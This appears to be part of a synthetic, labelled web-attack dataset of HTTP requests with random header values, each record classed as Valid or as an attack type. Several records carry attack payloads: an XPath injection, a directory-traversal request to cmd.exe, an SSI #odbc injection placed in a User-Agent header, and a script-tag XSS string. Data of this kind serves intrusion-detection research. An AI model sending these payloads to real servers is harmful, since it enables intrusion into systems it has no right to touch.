Cookie2: $Version="3"
Date: Fri, 06 Nov 09 24:20:31 CET
ETag: W/"Q@AC4Lmw@SZLGtcopsu1"
Expect: rvfkan=I3oV
From: erhtiA@esgifshqt.ch
If-Modified-Since: Sun, 04 Jun 06 15:38:00 UTC
If-Unmodified-Since: Fri, 11 May 07 13:39:59 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Apr 05 21:18:38 UTC
Max-Forwards: 9875
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest qop=t36diN
Authorization: 23n6t eftlquli=4Oaeoim
Range: 623768-8270,-361888,-69728
Referer: http://ottnl.gov/SsOa/ef0isGwo/7eMg3n.jpeg
TE: trailers,trailers
Trailer: TE
User-Agent: relcol0eit/4.4.5.1
UA-CPU: Sparc
UA-Disp: 308,802,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8809x6223
Via: 4.7 212.106.117.38:8768, HTTP/3.4 102.162.199.208
Transfer-Encoding: em7di; 2tel=1i6e
Upgrade: urte/7.8, e1ed/9.0, issit/3.7
Warning: 679 78.90.49.212 "tenHtlans6lsj" "Sun, 18 May 08 17:51:15 CET"
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 341663891374755
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esIws=aLQw-hQN-&kmRl10dysystemL6=ohko&ntjeof3ass=?eslee&5nAoaewxhnooa=1975&nisa4=93422&Mqog=8ir;

End - Id: 34826
Start - Id: 17298
class: Valid
GET /otd/yhawwhdat/dnDVp/rs/copy9m.varqEoHbWb/nM8O1QMf.gif?sock_stream30tTeF=8161882719&rllsg9=5&cdtas=hreHslrmctsCay0&rjeouut8i=aOMJ9j0LhR-&phiIsam=cQnlV8 HTTP/1.0
Host: 132.115.123.126
Connection: close
Accept: video/*;q=0.9
Accept-Charset: iso-8859-15;q=0.1, hz-gb-2312;q=0.1, euc-cn
Accept-Encoding: 
Accept-Language: iulopowm-Re;q=0.5, b-wembhwdt
Cache-Control: i9tp1i='vde00tr'
Client-ip: 8.71.56.250
Cookie: i6TtcE=189886
Cookie2: $Version="526"
Date: Mon, 22 Mar 04 17:58:36 CET
ETag: W/"tUtIzZLIRTEv2QLQH"
Expect: 100-continue
From: ahipt@bhraulhaa.fr
If-Modified-Since: Sun, 11 Jan 09 17:56:52 CET
If-Unmodified-Since: Sun, 04 Mar 07 09:35:39 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 25 Mar 05 04:31:06 GMT
Max-Forwards: 060
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: http://eeoR4.it/acted.mpg
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.2 (Windows; U; Win 9x 2.9; lo-sC; rv:3.7.7) Gecko/77782302
UA-CPU: StrongARM
UA-Disp: 7151,7445,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 0027x5589
Via: FTP/4.0 www.eut5T.jpeg, 4.3 www.egrac9b.js:5477, FTP/8.4 www.miai.jpg
Transfer-Encoding: tsEkuo; ehoneo=qoNrtitf
Upgrade: gnoa/0.3, nree/3.4, 2t3kns/8.8, Fnehon/4.7, kr7scp/0.5
Warning: 526 102.181.177.151 "iqxaehtm" "Wed, 11 Jun 08 17:56:22 GMT"
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17298
Start - Id: 16068
class: Valid
GET /eiuBKBk@ALe2PqKFip/a8gG8/ovabFIIBUl3L8/n0@v3iE/aNe9a4/WechoEEMwindow.open6U0TK/aqFA7BXIv/d.0ZcTbA2/yXeEYgEMbD.jpeg?9Cnocnshm=z3%40&lororciiarrNec=hcsnyprnsR&dloing=sit&bDreplace2DmetaJ=7wcU4xcr8T&fret62Eao0ItO=63227436&GIYFg1-pshUt=k7hoYsLT&wm=y%7CN1eieesaSiT&a8Cnutpstl1=piauan7touergbaeao&dta5tt=6643248&eUliiai9ls=bMT&t0=430150&wuIle=5298&eaeo6sejjylt9Mf=tap+ep3rm%3DKe HTTP/1.0
Host: www.droel.biz
Connection: ovIek
Accept: audio/basic;q=0.5
Accept-Charset: x-mac-arabic;q=0.9, x-mac-greek, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 15.101.56.243
Cookie: iqn8rhdnOa=>nsbodyoshutdownhi arp dtnhv;tEPuo=1tlo1formemesi6;XMTp@NGwp-z=o4o;eas=3ahtg;pkBhnc@=xtermai;siB1aoteg=5
Cookie2: $Version="69"
Date: Wed, 30 Sep 09 17:05:30 CET
ETag: "rNPQqSBe3adujrY"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Tue, 21 Feb 06 24:49:06 GMT
If-Unmodified-Since: Sat, 13 Sep 08 06:02:17 UTC
If-Match: *
If-None-Match: *
If-Range: "87bby4vHt773A8M2cD"
Max-Forwards: 781
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="neh7g"
Authorization: Basic eXVvMHRzZG46M2l3Ug==
Range: -84,27-038,192411-63468
Referer: http://iamyty.net/sxcnai/evnk/goeshs2/HebTt7/3nui.tiff
TE: deflate,trailers,deflate
Trailer: Via
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 6.9; ml-ie; rv:3.8.1) Gecko/03866107
UA-CPU: MIPS
UA-Disp: 489,939,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 973x791
Via: HTTP/4.0 www.iii0iadr.html, 7.0 www.vhfa.html
Transfer-Encoding: IiEs
Upgrade: LiIjol/2.0, i3o9c/4.2, oeoe2/3.1, dueh/3.0, sczse6/4.7
Warning: 143 75.253.104.203 "yotde2operezehhhize" 
X-Forwarded-For: 10.132.59.91
X-Serial-Number: 6495346475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16068
Start - Id: 49786
class: XPathInjection
GET /dperluYaqaAobgsoundlhomeZa/rSi6Qu27Vy8FaqxBDBI/tfzmFq8J.swf?Eltclelatm=7033+or+++++bsa%2FitTis%2Fpasp%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D17%5D++or+++++683%3D&7dti=%5Cxelserbb4yr HTTP/1.0
Host: 12.44.99.255:80
Connection: keep-alive
Accept: application/rtf;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: identity
Accept-Language: c-taYin2dt, dmtue-r, sjosnad-isdsi8Oa, pOih-eX, Hafea-pasm8ore;q=0.8
Cache-Control: only-if-cached
Client-ip: 197.120.23.169
Cookie: ss64Rtrls9tr05=a13vnwiopqtfi;uhulvdttlo2ey=rt3xse;eHl2=3;etLt9sindddFi=ri;isutrgsawoecw=1m8iwp-like?n]5wds&n|0 
Cookie2: $Version="6"
Date: Tue, 27 May 08 17:43:56 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: terol@hDey.ch
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Mon, 10 Dec 07 14:01:26 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 30 Oct 08 11:21:39 UTC
Max-Forwards: 630
MIME-Version: 5.9
Pragma: ire5a3et='my'
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: 800674-0,376-429,12-
Referer: http://P5acy6nA.fr/libeTt/aoeamNew.sh
TE: trailers,gzip;q=0.9,chunked;q=0.7
Trailer: Connection
User-Agent: Mozilla/5.3 (X11; U; Open BSD i586 2.3; lp-eo; rv:8.2.1) Gecko/38780331
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 742x2872
Via: 5.4 44.135.186.192:6212, FTP/7.0 www.vjle.gif, 8.1 www.adIlrHo.png
Transfer-Encoding: itis; kPpeyd=oSaaiixi
Upgrade: afn/1.9, wee/7.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49786
Start - Id: 27930
class: Valid
GET /qp577EhfV_hmB/ofb5gu8gvlT/H7mjEfKNkOAoD5Z/8A_mR/sohnph-kf4L/aea1taterssxsh/PGhdqS-Jstylew/sRar7qoeaE/LtI.png?eVichoet=Slib%7Eobject&ob3nctte8Nzkhds=v%5Dt%3Eunionaunhdeneprocessing-instruction%2F%3Civ&ysbR=0388471&Re70djgemkz=97541 HTTP/1.0
Host: www.d7tuan.biz:5
Connection: close
Accept: video/*;q=0.4, image/jpeg;q=0.1, video/quicktime;q=0.3
Accept-Charset: iso-8859-8, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 228.43.186.124
Cookie: edozswitT0tgr=htbCpiuca4mnmlfe
Cookie2: $Version="5"
Date: Sat, 31 Jan 09 10:02:53 UTC
ETag: W/"o8v-MLno5ziAoOj"
Expect: 100-continue
From: oexvSeVB@ohat.biz
If-Modified-Since: Sun, 18 Jun 06 10:32:50 UTC
If-Unmodified-Since: Sun, 05 Jul 09 10:47:53 CET
If-Match: *
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: "sUb-tYVH8G@AphhM"
Max-Forwards: 15
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest username="8zR2"
Authorization: NTLM R2VsbmFldWh0ZXluc203bnlpaXJjdnNubHR0dEhobVNz
Range: -14621,-370256
Referer: /hitHfap/Uhr1.tar
TE: trailers,trailers,chunked
Trailer: If-None-Match
User-Agent: natyaie8
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4388x7796
Via: mai/4.6 176.175.13.228, 8.2 www.g8eoo.html, HTTP/8.3 220.228.172.11
Transfer-Encoding: deflate
Upgrade: iakm/7.4, este/9.3, ieh/2.0, nt0Le/6.3, enx/9.5
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27930
Start - Id: 1303
class: Valid
GET /shsl5enaoerdnliO7u/ld5rrnatt/ervw/fda9/p@htaccesmochaXv1mSS6c./0MOWQformNlphpNSBC/it/hsegzonjoneonra/O5mJeZTSz.bin?njJK2PSiD6SQ=ptr%26tshome3h%3Batfrr&vo=sUa&ohotse=8399&KeobdcisBhoist=xmlaA&nrotcoSjsb0=%3A&oll9E0aezkoee=1&qlZNDNl-KEf=644&dDeysoir=tei9&toenpuu=%3Dhiaeelbetweenp&eteroniyneischh=1987842541&ebtUuthtursb=985433&so0vscfotie=314&iaeae=WLt&btaaSe9=2r%2Fadmin%3ByU%25img%2Fy HTTP/1.0
Host: www.aougx.de
Connection: r8itnesw
Accept: application/*;q=0.0, text/plain;q=0.7, audio/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: s0dgaO-O9d1dIj;q=0.8, n7dotscf-ievNor;q=0.0
Cache-Control: min-fresh=4831
Client-ip: 213.178.76.185
Cookie: hecertiin=7;seenheh=i@li%1c;V4XW=necfisnsbmstn;glhnopeliEh=718;Ohfrbhneas=0Ehcwyuxpywot;Z5FeXX=41386
Cookie2: $Version="712"
Date: Tue, 01 Aug 06 17:12:09 UTC
ETag: W/"r3JRCi64yWn0jqV4kC"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Mon, 03 Mar 08 16:38:09 UTC
If-Unmodified-Since: Sat, 10 May 08 18:11:02 GMT
If-Match: "tyqizW2Ik6lX8lc56"
If-None-Match: *
If-Range: Mon, 24 May 04 04:08:40 CET
Max-Forwards: 2889
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic dE8zb3I6aHNrdGt2Nm8=
Authorization: NTLM ZGl5ZEwydGlJYzd0dXR4aHRyM2lpY25udHRzdGVnZmhybw==
Range: -988,-63,-146
Referer: /nelgitxe/ir2ehAst/u7Oysd/e258/yercAlec.jsp
TE: trailers,trailers
Trailer: Warning
User-Agent: z0feeHo (hGbsfm; 3ghFpS; eguyHt-ecT; iT_LxXkU87)
UA-CPU: StrongARM
UA-Disp: 298,657,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7486x696
Via: 6.2 1.98.205.50
Transfer-Encoding: NnFeh
Upgrade: mutL/9.2, iiM/7.3, lustl/1.7
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 67843918306515180
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1303
Start - Id: 30512
class: Valid
GET /caoieyehcaynh2Ud/s3qth/netueEi4soci8ykkos/ofyh..ACDY-0M8D@.B4h/s7_WgbUAX1xm.mdb?l9ag=o30h&rnoRe=61768&rayt8k=ilS2mH3aA&EExqs40B-=tcSe6aeDxfoeht&eCKKgtGs.=sfmeAqskeeT HTTP/1.1
Host: www.mijs.gov
Connection: 4Ao0
Accept: application/*, application/*;q=0.8, video/mpeg;q=0.3
Accept-Charset: windows-1257;q=0.8
Accept-Encoding: compress
Accept-Language: 25re-ankoasel, gxiu-hwlee, 5oalt-IuesEnh;q=0.0
Cache-Control: no-transform
Client-ip: 92.192.95.92
Cookie: aji=nehoratB;eayShoxetjpn3=enp6aeahu;asHrobesuwsr=om
Cookie2: $Version="21"
Date: Sun, 22 Oct 06 14:02:17 CET
ETag: W/"hxld@9M9Xn5iqbaZ6CR"
Expect: hseef1s=i5gaS
From: qdtdedst@Snreomeo.de
If-Modified-Since: Wed, 03 Jun 09 03:29:22 CET
If-Unmodified-Since: Sun, 05 Jul 09 18:30:01 CET
If-Match: *
If-None-Match: "x1-UIQW.4.8FULS"
If-Range: Thu, 02 Dec 04 18:51:01 CET
Max-Forwards: 2
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM b0JXQXV0Y2RvMmFzTXN3bXR0ZjNldGVlVDdubjZzbHNwbkpuZXNkNXRzdGlxMGg=
Authorization: atnt6o soss=iop21m
Range: 41569-02,-25,-2
Referer: /le6issn/oidimam/fs4dtt/a9euu.cfm
TE: trailers,deflate
Trailer: Transfer-Encoding
User-Agent: zoi9tBhDeiaconun
UA-CPU: 68000
UA-Disp: 7538,1606,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 710x3564
Via: 5.9 www.mregsSxe.png:17939, 1.9 92.150.7.51
Transfer-Encoding: compress
Upgrade: 5rir/1.2, ag6/9.0, lli/9.6, ihcn/5.0
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 30512
Start - Id: 25340
class: Valid
GET /emItaoh/Rt/UnKtjbeRLE/OnaiEJdfslsRl/7Cnph-FlA/o47/Uvsock_streamJgroup byGOe/tjtinrauosahaU/a6n6LH-CL8JK9.js?FQIj7dKoM.qB=10562&ahan=kvbshihtacces%26t&eD2qiadieiur6=7&r4ginii1Boxrixh=%2Brl%28&rsnS6p8=apYd7Ajh HTTP/1.0
Host: www.Dgroi.com
Connection: pl7rabfn
Accept: application/x-tar;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=2616
Client-ip: 46.134.105.226
Cookie: haEdeletelzi=3;bimgLsBm9=2702540;inOht3elohng= ;ohae=ov9r3
Cookie2: $Version="5"
Date: Thu, 24 Jun 04 21:37:52 CET
ETag: "k0yDpisrt@FrTBjdjEE"
Expect: 100-continue
From: hait@1onahThh5t.net
If-Modified-Since: Tue, 15 Apr 08 04:54:04 GMT
If-Unmodified-Since: Sat, 24 Feb 07 13:34:26 CET
If-Match: "-eQfj_Gvn8DVW7INkqq"
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.rn0rrh.it/uox5plt/dRe5wf1t/sEfn/doaoli7/aepASr.cfm
Authorization: Digest cnonce="ifohe"
Range: -5,9601-,-779
Referer: http://www.li6mc.gov/wo3MEiT.nsf
TE: gzip
Trailer: Connection
User-Agent: Mozilla/6.3 (compatible; esmdtyR; Solaris; lzslnOttfr)
UA-CPU: 68000
UA-Disp: 645,174,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3370x895
Via: 0.0 77.113.241.143
Transfer-Encoding: gzip
Upgrade: ato/3.1
Warning: 507 www.m5ctauut.htm "aje7owrp58as" "Wed, 13 Jan 10 11:26:34 GMT"
X-Forwarded-For: 117.22.170.105
X-Serial-Number: 29493838100482691776
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25340
Start - Id: 25014
class: Valid
GET /ouCB-mH3b/88nc3RbinPQJZFf3/Ee1_SAx_cl_EHm/mhXVG0oKxS/itdl4ons/f01-JQYe0Q8hE/dQ/r3t6/kUX4Swn9mDBWiTVv9E.js?tn5ogtemip1t=sttitlt&Rq_LyRapXsS0=eninnxsgroup+bya7ch%5Bw&it=htaccesnN&dtTs=hKNr_%40PzU&oozr7edoe=rnoE-HZzWk0p HTTP/1.1
Host: 0.191.205.63
Connection: keep-alive
Accept: text/*;q=0.4, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.1, deflate;q=0.9, gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 225.193.4.111
Cookie: UV.yF@=ytHmailsl group byisto dropgr;dwr=rel nsnsflg;1boue=5linkIa<a7hYlrmg TFy;cmr=r
Cookie2: $Version="2"
Date: Wed, 29 Dec 04 05:05:07 GMT
ETag: W/"axFIC6TyS.bPm_4C"
Expect: wnenobd=9tseS;0scLco=Oedtaad
From: nzwrNfc3@izathr7huy.uk
If-Modified-Since: Sat, 20 Dec 08 01:49:05 UTC
If-Unmodified-Since: Tue, 06 Dec 05 02:24:48 UTC
If-Match: *
If-None-Match: "T7JX4AT2COUMxb2zx"
If-Range: Sun, 05 Jul 09 16:19:23 GMT
Max-Forwards: 22
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="lezief"
Authorization: Digest nc=C40B2b79
Range: 46-,280-2255,32588-
Referer: /eetfh2ma/NhKtha3.rar
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 5.1; eP-Tt; rv:2.1.3) Gecko/83184793
UA-CPU: MIPS
UA-Disp: 0119,2506,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 669x906
Via: 2.9 www.atl6h1c.jpg
Transfer-Encoding: identity
Upgrade: obsc4n/7.8, swq/1.1, ireR/7.9, aum/7.7
Warning: 922 25.148.114.39:28474 "fmaasanertcaeR" 
X-Forwarded-For: 190.232.63.32
X-Serial-Number: 92423943597
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25014
Start - Id: 43704
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.nhwu.cz
Connection: close
Accept: text/plain;q=0.6
Accept-Charset: x-mac-roman
Accept-Encoding: gzip, gzip, deflate;q=0.7, identity;q=0.9, gzip
Accept-Language: rraa-r, xIaCt-2, 3-r;q=0.4
Cache-Control: Rioyio1='h'
Client-ip: 131.122.223.243
Cookie: boU8iqylp4d=7516537927;gRtb9lai=05129;abtd=ofieencod;i51bisht1hShsa=1761834619
Cookie2: $Version="916"
Date: Sat, 21 Feb 04 22:45:24 CET
ETag: "-4D7Jo4QjAO6o6dlRPcD"
Expect: 100-continue
From: nnlogc@ewfasl3.ch
If-Modified-Since: Thu, 02 Apr 09 13:26:41 CET
If-Unmodified-Since: Tue, 27 Apr 10 06:11:31 UTC
If-Match: *
If-None-Match: "RDBcx-hQ1ZVcUqTD-"
If-Range: *
Max-Forwards: 4
MIME-Version: 8.9
Pragma: id=opgier
Proxy-Authorization: Digest username="6Yfo3"
Authorization: Digest nc=D9942BcD
Range: 251-3,844750-,3500-
Referer: /odhidei/Kpsortt/EtxtaeOu/1okh.doc
TE: trailers
User-Agent: oAmuomTmgemhehni9tan
UA-CPU: 68000
UA-Disp: 911,720,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5641x613
Via: FTP/3.9 50.200.48.127
Transfer-Encoding: gzip
Upgrade: HweTi/0.0, tten/3.8, hSbn/1.3, sniu/8.5, tfxay/0.5
Warning: 708 148.220.94.123 "t7popsifwheZr" 
X-Forwarded-For: 253.164.33.60
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43704
Start - Id: 40954
class: SSI
PUT /hsX7gFOYFoptmR/aeeaxmIa/i97--Co_nk_ow6dXWk/Gftrn.swf? HTTP/1.1
Content-Length: 242
Content-Language: wdto
Content-Encoding: deflate
Content-Location: /cTOlStep/HXIs/eanerytx/iaqes7Je.bin
Content-MD5: NDBqOWU0MW9Ha3JTbmhuZQ==
Content-Type: application/x-www-form-urlencoded
Host: www.9oenie.be
Connection: 3tpi
Accept: video/mpeg;q=0.0
Accept-Charset: windows-874;q=0.0, x-mac-hebrew;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: Cbc-E6;q=0.2
Cookie2: $Version="799"
Date: Wed, 25 Mar 09 15:29:42 GMT
If-Unmodified-Since: Fri, 09 Oct 09 15:17:58 UTC
If-Match: "Kj7gA0Z_uyAF2BprI"
If-None-Match: "EXaEie4st8PgI-Gd"
If-Range: Sun, 06 May 07 07:34:30 UTC
Max-Forwards: 7
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic aW5pZDpzdGtuYw==
Authorization: oa0or mmrsne=lnoiioke
Referer: /bebla/ontbeAe.conf
TE: chunked;q=0.3
User-Agent: <!--   #odbc  statement  = "select htHtenn8, ah,     wheenfe from     6bicNs0E   order by 5,  80,  7" -->
UA-Color: color32
Transfer-Encoding: fa5a5
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

trSle=190839662&yieentdntyEO=5734&pcyrTtrn=i.yIvD79fU6&bl=q@@.v@ivQ&iycdyhncicEs=4035166&fszetaeadegeq=693312&2sde8ts9iNgos=iN3&IswS=D u&onveo=31147942&soxromyo8=sv4mna &megydHbcqet=32322925&RHximggR6WBsD=iPIe8N76SV&idd5HBXJiStZ=os-tmpO

End - Id: 40954
Start - Id: 9014
class: Valid
GET /orbaNpsto0i2itbt1/rLMAd/t.S6XFowp/At0aEaeYyri.tiff?saiiinmhsioee6o=tnittrTArcdO8&dTYtf5ttlmh=aeaqT&BwyPfm3=dihIfN37&bfkugiNRHand=5&tEf0=elocdjgs&ufUpyirohhi=yfs%245&eexrka=nVT&trAaonoieqa9=vPthiQoVyR&tRtgeFela=orgeQST&sG6frxpr=655074156&Emqhierle5gtte=a20eeeteuxekcqtnn&bdc=%7Et%24no&OeR3=ntku%25nnthperlrTgr&tymqoaerh=ajs9&a4epttCtoEweec=6xrnoneccamZcsqS HTTP/1.1
Host: www.rmo6r.fr
Connection: nteyivyo
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=5
Client-ip: 165.127.16.139
Cookie: s0=171;JCugroup byHFaKg9=)
Cookie2: $Version="34"
Date: Thu, 06 May 04 12:29:27 GMT
ETag: "BU4387R@VTCZc_r3N"
Expect: rsna=taeheo4;iaiNrrni
From: moihss@1tlab.fr
If-Modified-Since: Mon, 21 Sep 09 01:14:53 CET
If-Unmodified-Since: Fri, 22 Feb 08 13:30:39 CET
If-Match: "AZjt1iYqN.ZgPAJNwHg"
If-None-Match: *
If-Range: *
Max-Forwards: 065
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic dWV5dGRzOmR2dWFo
Authorization: Digest opaque="o0jaaax"
Range: -751,66639-06
Referer: /eq0ne/pupgt69s.txt
TE: trailers,deflate,trailers
Trailer: From
User-Agent: oaepaera
UA-CPU: MIPS
UA-Disp: 7331,790,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7350x9086
Via: 1.3 www.aigdo.jpeg:331, 0.6 212.218.38.191:16215
Transfer-Encoding: compress
Upgrade: t7hloe/9.4, 2ku9/0.5, egeiae/4.4
Warning: 145 191.84.114.78 "casehmDc" 
X-Forwarded-For: 111.61.129.208
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9014
Start - Id: 47591
class: XSS
GET /eleLWMc0DCzVPK6GMc/o5/5XOmFacat6ALJ/rPR_47M/-c9.jpeg?d4reCt=%3C%3Cscript++++%3E%5Balert%28%27eoodq3ran%27%29%3B%5D%3C%2Fscript%3E&9zor=iaae&EkEUYo=Aownt5sdam&ahitn7hdn7nT=7966&0binSZM=82&KupV-OsWWNM=337 HTTP/1.1
Host: www.0iunU.ch
Connection: itEtaf
Accept: audio/*;q=0.5
Accept-Charset: utf-7;q=0.2, iso-8859-9, koi8;q=0.1, iso-8859-1;q=0.0, euc-kr
Accept-Encoding: 
Accept-Language: 6hems-svwNanr, lpwTOa-leio
Cache-Control: no-store
Client-ip: 89.98.57.72
Cookie: uaIz=o;oAdciyosolujve=s7i7FFT89;mkc=passwdn
Cookie2: $Version="4"
Date: Sun, 26 Mar 06 09:38:13 GMT
ETag: W/"k.NJardhH9CSLO.eFKv"
Expect: 100-continue
From: pefnsi@neeUgitin6.gov
If-Modified-Since: Sun, 20 Sep 09 14:01:42 GMT
If-Unmodified-Since: Sat, 13 May 06 20:22:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 85
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest qop=m2ta
Authorization: Basic dzJob2FjOmVpcmdFbnI=
Range: 849916-
Referer: /rcmvNtE.zip
TE: deflate,trailers,chunked
Trailer: If-None-Match
User-Agent: LOmfeatrr (n1zosWJ3a)
UA-CPU: StrongARM
UA-Disp: 672,0345,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 428x2370
Via: 8eln3n/1.4 www.anntb.js
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 691 91.163.92.153 "daitswr4lqZadnb" 
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47591
Start - Id: 13040
class: Valid
GET /fAWZ1aOstdinRZ/9XPu8EBn2Ct/oEUO@CQaX9gS@/tur641Il/sPUx54rM7ekUAG@ab.jpeg?cl=cgKHPre HTTP/1.0
Host: 225.73.155.11
Connection: eShn5nee
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 82.22.221.79
Cookie: @WX4=566513;imoahjne9atesf=07306781;utr=2074309624
Cookie2: $Version="0"
Date: Thu, 11 Mar 04 18:03:46 CET
ETag: "BIB_5TeEKvZ3Oi.bF9h@"
Expect: eptntiDy
From: isn1r@lopp9e.fr
If-Modified-Since: Thu, 06 Oct 05 22:03:23 UTC
If-Unmodified-Since: Mon, 27 Dec 04 08:52:54 GMT
If-Match: *
If-None-Match: ".RpdpSlTVrNsQht"
If-Range: Sun, 06 Apr 08 10:47:32 CET
Max-Forwards: 8
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM bkdhaHVobGVzdndsZXZzZnVlU3NhZWd0ZWkxeXhpNWVuWnlhaHJpajlzbA==
Authorization: Basic YTA4bDg6c2JBc2hu
Range: 309-6,-2
Referer: /qyggrrtt/ttEblre/sjrbo3ui/4uewdi.pdf
TE: trailers,trailers,chunked;q=0.8
Trailer: Warning
User-Agent: tpcs4st6wner7Ineac
UA-CPU: x86
UA-Disp: 5331,978,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 011x9947
Via: 8.1 212.173.78.75, 0.5 www.eieip.jpeg, HTTP/2.1 123.159.78.193:6
Transfer-Encoding: identity
Upgrade: uede/9.7
Warning: 652 138.93.253.43 "apimlrrynaOtM" 
X-Forwarded-For: 28.63.48.40
X-Serial-Number: 72290
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13040
Start - Id: 8623
class: Valid
GET /nrplnrhntqsuJsopt/onTositshhifsd/5-MI5t0.L.0Awc/_BFwbgsound.css?MnTR9%u4=racooian&5dPlRoaaHraeL=b+hsigii%24uniondelxeck&anc=lm&oEawt=ia7&Callhg6S_yV4o=37300&0-.EDTTz=517679019&@T030gwqMo91=3730&oa=peitcgr7ooinserti%5Cd&aa6czxa5egE=Arildriooo%28m&b1ebiioaw=HczgAeye900mphi HTTP/1.0
Host: www.cpa3Feud.biz
Connection: keep-alive
Accept: */*
